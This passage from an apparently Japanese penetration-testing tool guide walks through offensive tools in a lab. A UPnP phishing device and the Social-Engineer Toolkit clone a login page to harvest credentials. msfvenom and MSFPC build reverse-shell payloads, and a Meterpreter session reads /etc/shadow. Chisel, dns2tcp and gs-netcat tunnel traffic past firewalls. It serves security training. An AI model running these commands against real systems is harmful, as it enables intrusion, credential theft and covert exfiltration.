[M-SEARCH] New Host 192.168.11.4, Service Type: urn:schemas-upnp-org:device:InternetGatewayDevice:1
[XML REQUEST] Host: 192.168.11.4, User-Agent: Microsoft-Windows/10.0 UPnP/1.0
GET /ssdp/device-desc.xml
[M-SEARCH] New Host 192.168.11.4, Service Type: uuid:5ba2b1bb-9c1b-4b76-9650-391da7e852ea
[XML REQUEST] Host: 192.168.11.4, User-Agent: Microsoft-Windows/10.0 UPnP/1.0
GET /ssdp/device-desc.xml
[XML REQUEST] Host: 192.168.11.4, User-Agent: DAFUPnP
GET /ssdp/device-desc.xml
ネットワークにOffice365 Backupsというデバイスが表示される
デバイスをダブルクリックするとブラウザにログイン画面が表示されるので認証情報を入力
入力した認証情報がコンソールに表示される
[XML REQUEST] Host: 192.168.11.4, User-Agent: Microsoft-Windows/10.0 UPnP/1.0
GET /ssdp/device-desc.xml
[XML REQUEST] Host: 192.168.11.4, User-Agent: DAFUPnP
GET /ssdp/device-desc.xml
[PHISH HOOKED] Host: 192.168.11.4, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
GET /present.html
[CREDS GIVEN] HOST: 192.168.11.4, FORM-POST CREDS: username=hello&password=world
Social-Engineer Toolkit (SET)
ソーシャル・エンジニアリング攻撃用のフレームワークです。様々な組み込みの攻撃ベクトルがあり、信憑性のある攻撃を素早く行うことができます。
■ 使用例
root@kali_1:~# setoolkit
[...]
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
set> 1
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
set:webattack> 3
[...]
1) Web Templates
2) Site Cloner
3) Custom Import
set:webattack> 2
[...]
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.11.3]: 192.168.11.3
[...]
set:webattack> Enter the url to clone: https://qiita.com/login
[...]
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
複製したログイン画面で認証情報を入力してログインを行う
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
# 入力した認証情報が表示される
[*] WE GOT A HIT! Printing the output:
PARAM: authenticity_token=GtWS8sj0m9suM49jr9wD1YkRhBc7pOm2HfjPEFFStP7wZWhyiC5sv8cuIFkWd-ofnDr99749YmxakvdGSW8TXQ
PARAM: identity=hello@example.com
POSSIBLE PASSWORD FIELD FOUND: password=helloworld
PARAM: commit=Log+in+to+Qiita
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Multi-purpose Toolkit
Metasploit Framework
多様なエクスプロイトやエクスプロイト開発環境、ネットワーク情報収集ツールやWeb脆弱性プラグインなどセキュリティ監査に必要なアセットを提供します。
[ msfconsole ]
■ 使用方法
root@kali:~# msfconsole --help
Usage: msfconsole [options]
Common options:
-E, --environment ENVIRONMENT Set Rails environment, defaults to RAIL_ENV environment variable or 'production'
Database options:
-M, --migration-path DIRECTORY Specify a directory containing additional DB migrations
-n, --no-database Disable database support
-y, --yaml PATH Specify a YAML file containing database settings
Framework options:
-c FILE Load the specified configuration file
-v, -V, --version Show version
Module options:
--[no-]defer-module-loads Defer module loading unless explicitly asked
-m, --module-path DIRECTORY Load an additional module path
Console options:
-a, --ask Ask before exiting Metasploit or accept 'exit -y'
-H, --history-file FILE Save command history to the specified file
-l, --logger STRING Specify a logger to use (Flatfile, Stderr, Stdout, StdoutWithoutTimestamps, TimestampColorlessFlatfile)
--[no-]readline
-L, --real-readline Use the system Readline library instead of RbReadline
-o, --output FILE Output to the specified file
-p, --plugin PLUGIN Load a plugin on startup
-q, --quiet Do not print the banner on startup
-r, --resource FILE Execute the specified resource file (- for stdin)
-x, --execute-command COMMAND Execute the specified console commands (use ; for multiples)
-h, --help Show this message
■ 使用例
root@kali:~# msfconsole
# SNMP経由でホストの詳細を列挙
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.11.4
msf6 auxiliary(scanner/snmp/snmp_enum) > set VERSION 2c
msf6 auxiliary(scanner/snmp/snmp_enum) > run
[+] 192.168.11.4, Connected.
[*] System information:
Host IP : 192.168.11.4
Hostname : server4test
Description : Linux server4test 5.15.153.1 #1 SMP Fri Mar 29 23:14:13 UTC 2024 x86_64
Contact : msfdev@metasploit.com
Location : Metasploit Lab
Uptime snmp : 06:54:27.07
Uptime system : 00:00:23.50
System date : 2024-10-23 03:30:46.0
[...]
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 21 0.0.0.0 0 listen
0.0.0.0 23 0.0.0.0 0 listen
0.0.0.0 25 0.0.0.0 0 listen
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 111 0.0.0.0 0 listen
0.0.0.0 139 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 512 0.0.0.0 0 listen
0.0.0.0 513 0.0.0.0 0 listen
0.0.0.0 514 0.0.0.0 0 listen
0.0.0.0 1099 0.0.0.0 0 listen
0.0.0.0 1524 0.0.0.0 0 listen
0.0.0.0 3306 0.0.0.0 0 listen
0.0.0.0 5432 0.0.0.0 0 listen
[...]
[*] Storage information:
Description : ["Physical memory"]
Device id : [#<SNMP::Integer:0x00007f82bcfd3c48 @value=1>]
Filesystem type : ["Ram"]
Device unit : [#<SNMP::Integer:0x00007f82bcfd1b50 @value=1024>]
Memory size : 7.71 GB
Memory used : 1.88 GB
Description : ["Virtual memory"]
Device id : [#<SNMP::Integer:0x00007f82bcfdbc40 @value=3>]
Filesystem type : ["Virtual Memory"]
Device unit : [#<SNMP::Integer:0x00007f82bcfd9210 @value=1024>]
Memory size : 9.71 GB
Memory used : 1.88 GB
[...]
[ msfvenom ]
■ 使用方法
root@kali:~# msfvenom --help
Usage: /usr/bin/msfvenom [options] <var=val>
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>\'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
■ 使用例
# ターゲットホスト上で実行するためのMeterpreterシェルを作成
root@kali:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.11.3 LPORT=4444 -f elf -o meterpreter
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: meterpreter
root@kali:~# msfconsole
# ターゲットホストからのペイロードを受け取るハンドラを実行
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 127.0.0.1:4444
# 作成したMeterpreterシェルをターゲットのホストにコピーして実行すると2台のホスト間でセッションが確立される
[*] Sending stage (1017704 bytes) to 192.168.11.4
[*] Meterpreter session 1 opened (192.168.11.3:4444 -> 192.168.11.4:41018) at 2024-10-23 11:33:16 +0000
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
# ターゲットホストで任意のシェルを実行
meterpreter > shell
Process 396 created.
Channel 3 created.
# hostnameコマンドを実行するとターゲットホストのホスト名が表示される
hostname
server4test
exit
# ターゲットホストのパスワードファイルの内容を表示
meterpreter > cat /etc/shadow
root:*:19974:0:99999:7:::
daemon:*:19974:0:99999:7:::
bin:*:19974:0:99999:7:::
sys:*:19974:0:99999:7:::
sync:*:19974:0:99999:7:::
[...]
hello:$y$j9T$NODsKcm9YeFgRqGmdGhWL.$0fvMjjFmB7XR5WUiEamyohG.kpPNz2lbNI1kKT3yJzD:20019:0:99999:7:::
MSFPC
Metasploit Framework用のMeterpreterスクリプトを自動生成します。
■ 使用方法
root@kali:~# msfpc --help
/usr/bin/msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
<TYPE>:
+ APK
+ ASP
+ ASPX
+ Bash [.sh]
+ Java [.jsp]
+ Linux [.elf]
+ OSX [.macho]
+ Perl [.pl]
+ PHP
+ Powershell [.ps1]
+ Python [.py]
+ Tomcat [.war]
+ Windows [.exe // .exe // .dll]
Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.
Missing <PORT> will default to 443.
<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
Missing <BIND/REVERSE> will default to <REVERSE>.
<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGELESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.
<VERBOSE> will display more information.
■ 使用例
root@kali:~# msfpc stageless cmd py tcp
[*] MSFvenom Payload Creator (MSFPC v1.4.5)
[i] Use which interface - IP address?:
[i] 1.) lo - 127.0.0.1
[i] 2.) eth0 - 192.168.11.3
[i] 3.) wan - 153.129.xxx.xxx
[?] Select 1-3, interface or IP address: 2
[i] IP: 192.168.11.3
[i] PORT: 443
[i] TYPE: python (python/shell_reverse_tcp)
[i] CMD: msfvenom -p python/shell_reverse_tcp -f raw \
--platform python -e generic/none -a python LHOST=192.168.11.3 LPORT=443 \
> '/root/python-shell-stageless-reverse-tcp-443.py'
[i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'
[i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'
[i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
# コンソール起動時に作成したスクリプトを実行
root@kali:~# msfconsole -r python-shell-stageless-reverse-tcp-443-py.rc
[*] Processing python-shell-stageless-reverse-tcp-443-py.rc for ERB directives.
resource (python-shell-stageless-reverse-tcp-443-py.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (python-shell-stageless-reverse-tcp-443-py.rc)> set PAYLOAD python/shell_reverse_tcp
PAYLOAD => python/shell_reverse_tcp
resource (python-shell-stageless-reverse-tcp-443-py.rc)> set LHOST 192.168.11.3
LHOST => 192.168.11.3
resource (python-shell-stageless-reverse-tcp-443-py.rc)> set LPORT 443
LPORT => 443
resource (python-shell-stageless-reverse-tcp-443-py.rc)> set ExitOnSession false
ExitOnSession => false
resource (python-shell-stageless-reverse-tcp-443-py.rc)> set EnableStageEncoding true
[!] Unknown datastore option: EnableStageEncoding. Did you mean EnableContextEncoding?
EnableStageEncoding => true
resource (python-shell-stageless-reverse-tcp-443-py.rc)> run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.11.3:443
# ターゲットホスト側で作成したPythonスクリプトを実行してホスト間のセッションを確立
msf6 exploit(multi/handler) > [*] Command shell session 1 opened (192.168.11.3:443 -> 192.168.11.4:37204) at 2024-10-24 07:36:38 +0000
Post-Exploitation Tools
Intercepting, Tunneling and Port Forwarding
Chisel
WebSocketを使用してサーバー・クライアント間にセキュアなトンネル接続を確立します。
■ 使用方法
root@kali:~# chisel server --help
Usage: chisel server [options]
Options:
--host, Defines the HTTP listening host – the network interface
(defaults the environment variable HOST and falls back to 0.0.0.0).
--port, -p, Defines the HTTP listening port (defaults to the environment
variable PORT and fallsback to port 8080).
--key, (deprecated use --keygen and --keyfile instead)
An optional string to seed the generation of a ECDSA public
and private key pair. All communications will be secured using this
key pair. Share the subsequent fingerprint with clients to enable detection
of man-in-the-middle attacks (defaults to the CHISEL_KEY environment
variable, otherwise a new key is generate each run).
--keygen, A path to write a newly generated PEM-encoded SSH private key file.
If users depend on your --key fingerprint, you may also include your --key to
output your existing key. Use - (dash) to output the generated key to stdout.
--keyfile, An optional path to a PEM-encoded SSH private key. When
this flag is set, the --key option is ignored, and the provided private key
is used to secure all communications. (defaults to the CHISEL_KEY_FILE
environment variable). Since ECDSA keys are short, you may also set keyfile
to an inline base64 private key (e.g. chisel server --keygen - | base64).
--authfile, An optional path to a users.json file. This file should
be an object with users defined like:
{
"<user:pass>": ["<addr-regex>","<addr-regex>"]
}
when <user> connects, their <pass> will be verified and then
each of the remote addresses will be compared against the list
of address regular expressions for a match. Addresses will
always come in the form "<remote-host>:<remote-port>" for normal remotes
and "R:<local-interface>:<local-port>" for reverse port forwarding
remotes. This file will be automatically reloaded on change.
--auth, An optional string representing a single user with full
access, in the form of <user:pass>. It is equivalent to creating an
authfile with {"<user:pass>": [""]}. If unset, it will use the
environment variable AUTH.
--keepalive, An optional keepalive interval. Since the underlying
transport is HTTP, in many instances we\'ll be traversing through
proxies, often these proxies will close idle connections. You must
specify a time with a unit, for example '5s' or '2m'. Defaults
to '25s' (set to 0s to disable).
--backend, Specifies another HTTP server to proxy requests to when
chisel receives a normal HTTP request. Useful for hiding chisel in
plain sight.
--socks5, Allow clients to access the internal SOCKS5 proxy. See
chisel client --help for more information.
--reverse, Allow clients to specify reverse port forwarding remotes
in addition to normal remotes.
--tls-key, Enables TLS and provides optional path to a PEM-encoded
TLS private key. When this flag is set, you must also set --tls-cert,
and you cannot set --tls-domain.
--tls-cert, Enables TLS and provides optional path to a PEM-encoded
TLS certificate. When this flag is set, you must also set --tls-key,
and you cannot set --tls-domain.
--tls-domain, Enables TLS and automatically acquires a TLS key and
certificate using LetsEncrypt. Setting --tls-domain requires port 443.
You may specify multiple --tls-domain flags to serve multiple domains.
The resulting files are cached in the "$HOME/.cache/chisel" directory.
You can modify this path by setting the CHISEL_LE_CACHE variable,
or disable caching by setting this variable to "-". You can optionally
provide a certificate notification email by setting CHISEL_LE_EMAIL.
--tls-ca, a path to a PEM encoded CA certificate bundle or a directory
holding multiple PEM encode CA certificate bundle files, which is used to
validate client connections. The provided CA certificates will be used
instead of the system roots. This is commonly used to implement mutual-TLS.
--pid Generate pid file in current working directory
-v, Enable verbose logging
--help, This help text
root@kali:~# chisel client --help
Usage: chisel client [options] <server> <remote> [remote] [remote] ...
<server> is the URL to the chisel server.
<remote>s are remote connections tunneled through the server, each of
which come in the form:
<local-host>:<local-port>:<remote-host>:<remote-port>/<protocol>
■ local-host defaults to 0.0.0.0 (all interfaces).
■ local-port defaults to remote-port.
■ remote-port is required*.
■ remote-host defaults to 0.0.0.0 (server localhost).
■ protocol defaults to tcp.
which shares <remote-host>:<remote-port> from the server to the client
as <local-host>:<local-port>, or:
R:<local-interface>:<local-port>:<remote-host>:<remote-port>/<protocol>
which does reverse port forwarding, sharing <remote-host>:<remote-port>
from the client to the server\'s <local-interface>:<local-port>.
When the chisel server has --socks5 enabled, remotes can
specify "socks" in place of remote-host and remote-port.
The default local host and port for a "socks" remote is
127.0.0.1:1080. Connections to this remote will terminate
at the server\'s internal SOCKS5 proxy.
When the chisel server has --reverse enabled, remotes can
be prefixed with R to denote that they are reversed. That
is, the server will listen and accept connections, and they
will be proxied through the client which specified the remote.
Reverse remotes specifying "R:socks" will listen on the server's
default socks port (1080) and terminate the connection at the
client\'s internal SOCKS5 proxy.
When stdio is used as local-host, the tunnel will connect standard
input/output of this program with the remote. This is useful when
combined with ssh ProxyCommand. You can use
ssh -o ProxyCommand='chisel client chiselserver stdio:%h:%p' \
user@example.com
to connect to an SSH server through the tunnel.
Options:
--fingerprint, A *strongly recommended* fingerprint string
to perform host-key validation against the server\'s public key.
Fingerprint mismatches will close the connection.
Fingerprints are generated by hashing the ECDSA public key using
SHA256 and encoding the result in base64.
Fingerprints must be 44 characters containing a trailing equals (=).
--auth, An optional username and password (client authentication)
in the form: "<user>:<pass>". These credentials are compared to
the credentials inside the server\'s --authfile. defaults to the
AUTH environment variable.
--keepalive, An optional keepalive interval. Since the underlying
transport is HTTP, in many instances we\'ll be traversing through
proxies, often these proxies will close idle connections. You must
specify a time with a unit, for example '5s' or '2m'. Defaults
to '25s' (set to 0s to disable).
--max-retry-count, Maximum number of times to retry before exiting.
Defaults to unlimited.
--max-retry-interval, Maximum wait time before retrying after a
disconnection. Defaults to 5 minutes.
--proxy, An optional HTTP CONNECT or SOCKS5 proxy which will be
used to reach the chisel server. Authentication can be specified
inside the URL.
For example, http://admin:password@my-server.com:8081
or: socks://admin:password@my-server.com:1080
--header, Set a custom header in the form "HeaderName: HeaderContent".
Can be used multiple times. (e.g --header "Foo: Bar" --header "Hello: World")
--hostname, Optionally set the 'Host' header (defaults to the host
found in the server url).
--sni, Override the ServerName when using TLS (defaults to the
hostname).
--tls-ca, An optional root certificate bundle used to verify the
chisel server. Only valid when connecting to the server with
"https" or "wss". By default, the operating system CAs will be used.
--tls-skip-verify, Skip server TLS certificate verification of
chain and host name (if TLS is used for transport connections to
server). If set, client accepts any TLS certificate presented by
the server and any host name in that certificate. This only affects
transport https (wss) connection. Chisel server\'s public key
may be still verified (see --fingerprint) after inner connection
is established.
--tls-key, a path to a PEM encoded private key used for client
authentication (mutual-TLS).
--tls-cert, a path to a PEM encoded certificate matching the provided
private key. The certificate must have client authentication
enabled (mutual-TLS).
--pid Generate pid file in current working directory
-v, Enable verbose logging
--help, This help text
■ 使用例
# 秘密鍵を作成
root@kali_1:~# chisel server --keygen - > chisel.key
# ホスト1で4444番ポートを使ってサーバーを起動(秘密鍵を指定しない場合はフィンガープリントが毎回変わる)
root@kali_1:~# chisel server --keyfile chisel.key -p 4444 --socks5 --reverse
2024/12/05 09:25:59 server: Reverse tunnelling enabled
2024/12/05 09:25:59 server: Fingerprint FgcOM015ItBc+v4nCF0suWrfFH95o8hLhOaCy5hYKwI=
2024/12/05 09:25:59 server: Listening on http://0.0.0.0:4444
# ホスト2でクライアント1(ポートフォワード用)を起動
root@kali_2:~# chisel client --fingerprint "FgcOM015ItBc+v4nCF0suWrfFH95o8hLhOaCy5hYKwI=" 192.168.11.3:4444 R:2222:localhost:22
2024/12/05 09:34:09 client: Connecting to ws://192.168.11.3:4444
2024/12/05 09:34:09 client: Fingerprint FgcOM015ItBc+v4nCF0suWrfFH95o8hLhOaCy5hYKwI=
2024/12/05 09:34:09 client: Connected (Latency 2.109852ms)
# ホスト2でクライアント2(SOCKS5プロキシ用)を起動
root@kali_2:~# chisel client --fingerprint "FgcOM015ItBc+v4nCF0suWrfFH95o8hLhOaCy5hYKwI=" 192.168.11.3:4444 socks
2024/12/05 09:34:19 client: Connecting to ws://192.168.11.3:4444
2024/12/05 09:34:19 client: Fingerprint FgcOM015ItBc+v4nCF0suWrfFH95o8hLhOaCy5hYKwI=
2024/12/05 09:34:19 client: Connected (Latency 295.921µs)
2024/12/05 09:34:19 client: tun: proxy#127.0.0.1:1080=>socks: Listening
# ホスト1からポートフォワードでホスト2にSSH接続
root@kali_1:~# ssh hello@127.0.0.1 -p 2222
hello@127.0.0.1\'s password:
$ hostname
kali_2
# ホスト1でncatをリスナーモードで起動
root@kali_1:~# ncat -l > hello.txt
# SOCKS5プロキシサーバー経由でホスト2からホスト1にファイルを送信
root@kali_2:~# ncat --send-only --proxy 127.0.0.1:1080 --proxy-type socks5 192.168.11.3 < hello.txt
Dns2tcp
DNSプロトコル上でTCPコネクションを中継します。
■ 使用方法
# サーバー
root@kali:~# dns2tcpd --help
Usage : dns2tcpd [ -i IP ] [ -F ] [ -d debug_level ] [ -f config-file ] [ -p pidfile ]
-F : dns2tcpd will run in foreground
# クライアント
root@kali:~# dns2tcpc --help
Usage : dns2tcpc [options] [server]
-c : enable compression
-z <domain> : domain to use (mandatory)
-d <1|2|3> : debug_level (1, 2 or 3)
-r <resource> : resource to access
-k <key> : pre-shared key
-f <filename> : configuration file
-l <port|-> : local port to bind, '-' is for stdin (mandatory if resource defined without program )
-e <program> : program to execute
-t <delay> : max DNS server\'s answer delay in seconds (default is 3)
-T <TXT|KEY> : DNS request type (default is TXT)
server : DNS server to use
If no resources are specified, available resources will be printed
■ 使用例
# ホスト1
# 設定ファイル作成
root@kali_1:~# cat > ~/.dns2tcpdrc << EOF
listen = 0.0.0.0
port = 53
user = hello
key = secret
domain = example.com
resources = ssh:127.0.0.1:22
EOF
# Dns2tcpサーバー起動
root@kali_1:~# dns2tcpd -F -d 1
06:46:32 : Debug options.c:97 Add resource ssh:127.0.0.1 port 22
06:46:32 : Debug socket.c:54 Listening on 0.0.0.0:53 for domain 86world.dev
Starting Server v0.5.2...
[...]
# ホスト2
# 設定ファイル作成
root@kali_2:~# cat > ~/.dns2tcprc << EOF
domain = example.com
resource = ssh
local_port = 4430
debug_level = 1
key = secret
server = 192.168.11.4
EOF
# Dns2tcpクライアント起動
root@kali_2:~# dns2tcpc
debug level 1
Listening on port : 4430
[...]
# Dns2tcpクライアントを介してホスト1にSSH接続
root@kali_2:~# ssh hello@127.0.0.1 -p 4430 -D 22
hello@127.0.0.1\'s password:
[...]
Last login: Thu Sep 26 07:03:07 2024 from 2001:db8::2
$ hostname
kali_1
# クライアント側でtcpdumpを使ってパケットをキャプチャ
root@kali:~# tcpdump -n -i eth0 port 53
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
# TXTレコードに対するDNSクエリに偽装してデータの送受信を行っている
06:46:16.042185 IP 192.168.11.4.45332 > 192.168.11.3.53: 17969+ TXT? AAAAAIjhAA.=auth.example.com. (46)
06:46:16.042456 IP 192.168.11.3.53 > 192.168.11.4.45332: 17969* 1/0/0 TXT "ANyYAAIjhADI2UEFGMDBVQkhJMFhSVjU" "" (92)
06:46:16.042567 IP 192.168.11.4.45332 > 192.168.11.3.53: 25829+ TXT? NyaFgAABADdGQ0M5OTQyRkFBMEM5OEFGNDEzNzI1NDA1MUFGMkJBOTg0QjIxMzA.=auth.example.com. (99)
06:46:16.042615 IP 192.168.11.3.53 > 192.168.11.4.45332: 25829* 1/0/0 TXT "ANyaFgAABAA" "" (124)
06:46:16.042701 IP 192.168.11.4.45332 > 192.168.11.3.53: 49240+ TXT? NybVsXHvAHNzaA.=connect.example.com. (53)
06:46:16.042955 IP 192.168.11.3.53 > 192.168.11.4.45332: 49240* 1/0/0 TXT "ANybVsXHvAA" "" (78)
06:46:16.043139 IP 192.168.11.4.45332 > 192.168.11.3.53: 13465+ TXT? NyYAAAABBA.example.com. (40)
06:46:16.043184 IP 192.168.11.4.45332 > 192.168.11.3.53: 9053+ TXT? NyYAAAACCFNTSC0yLjAtT3BlblNTSF85LjdwMSBEZWJpYW4tNw0K.example.com. (82)
06:46:16.043200 IP 192.168.11.4.45332 > 192.168.11.3.53: 8507+ TXT? NyYAAAADBA.example.com. (40)
06:46:16.051643 IP 192.168.11.3.53 > 192.168.11.4.45332: 13465* 1/0/0 TXT "ANyYAAAABGFNTSC0yLjAtT3BlblNTSF85LjlwMSBEZWJpYW4tMw0K" "" (107)
06:46:16.051749 IP 192.168.11.4.45332 > 192.168.11.3.53: 61386+ TXT? NyYAAQAEBA.example.com. (40)
[...]
Global Socket
異なるプライベートネットワーク上の(FWやNATの背後にある)2つのホストマシンがGSRN(グローバル・ソケット・リレー・ネットワーク)を介して互いに通信することを可能にします。
■ 使用方法
root@kali:~# gs-netcat --help
gs-netcat [-skrlgvqwCTLtSDuim] [-s secret] [-e cmd] [-p port] [-d ip]
-s <secret> Secret (e.g. password).
-k <file> Read Secret from file.
-r Receive-only. Terminate when no more data.
-I Ignore EOF on stdin.
-l Listening server [default: client]
-g Generate a Secret (random)
-v Verbose. -vv more verbose. -vvv insanely verbose
-q Quiet. No log output
-w Wait for server to become available [client only]
-C Disable encryption
-T Use TOR or any Socks proxy (See gs-netcat(1))
-L <file> Logfile
-t Check if peer is listening (do not connect)
-S Act as a SOCKS server [needs -l]
-D Daemon & Watchdog mode [background]
-d <IP> IPv4 address for port forwarding
-p <port> Port to listen on or forward to
-u Use UDP [requires -p]
-i Interactive login shell (TTY) [Ctrl-e q to terminate]
-e <cmd> Execute command [e.g. "bash -il" or "id"]
-m Display man page
■ 使用例
# ホストA(サーバー)
root@kali_a:~# hostname
kali_a
root@kali_a:~# gs-netcat -l -i -s <任意のシークレット>
=Secret : ***************
=Encryption : SRP-AES-256-CBC-SHA-End2End (Prime: 4096 bits)
# ホストB(クライアント)
root@kali_b:~# hostname
kali_b
root@kali_b:~# gs-netcat -i -s <サーバー起動時に指定したシークレット>
=Secret : ***************
=Encryption : SRP-AES-256-CBC-SHA-End2End (Prime: 4096 bits)
=Hint : PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
┌──(root㉿kali_a)-[/]
└─# hostname
kali_a
# ホストA(サーバー)
# GSサーバーとの通信はSSL(443ポート)で行われている
root@kali_a:~# tcpdump -n -i eth0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
04:22:06.331438 IP 192.168.11.3.45051 > 192.168.11.1.53: 36095+ A? v.gs.thc.org. (30)
04:22:06.623812 IP 192.168.11.1.53 > 192.168.11.3.45051: 36095 1/0/0 A 135.125.107.221 (58)
04:22:06.625494 IP 192.168.11.3.43868 > 135.125.107.221.443: Flags [S], seq 196820842, win 64240, options [mss 1460,sackOK,TS val 3655078917 ecr 0,nop,wscale 7], length 0
04:22:06.906336 IP 135.125.107.221.443 > 192.168.11.3.43868: Flags [S.], seq 101136752, ack 196820843, win 29184, options [mss 1460,nop,nop,TS val 3794457547 ecr 3655078917,nop,wscale 7], length 0
04:22:06.906504 IP 192.168.11.3.43868 > 135.125.107.221.443: Flags [.], ack 1, win 502, options [nop,nop,TS val 3655079197 ecr 3794457547], length 0
04:22:06.906894 IP 192.168.11.3.43868 > 135.125.107.221.443: Flags [P.], seq 1:129, ack 1, win 502, options [nop,nop,TS val 3655079198 ecr 3794457547], length 128
04:22:06.909546 IP 135.125.107.221.443 > 192.168.11.3.43868: Flags [.], ack 129, win 227, options [nop,nop,TS val 3794457551 ecr 3655079198], length 0
04:22:12.872612 IP 192.168.11.3.43868 > 135.125.107.221.443: Flags [F.], seq 129, ack 1, win 502, options [nop,nop,TS val 3655085164 ecr 3794457551], length 0
04:22:12.873600 IP 135.125.107.221.443 > 192.168.11.3.43868: Flags [.], ack 130, win 4093, options [nop,nop,TS val 3794463515 ecr 3655079198], length 0
04:22:13.150575 IP 135.125.107.221.443 > 192.168.11.3.43868: Flags [F.], seq 1, ack 130, win 4096, options [nop,nop,TS val 3794463784 ecr 3655085164], length 0
iodine
IPv4データの送受信をDNSクエリに偽装して行います。
■ 使用方法
# サーバー
root@kali:~# iodined -h
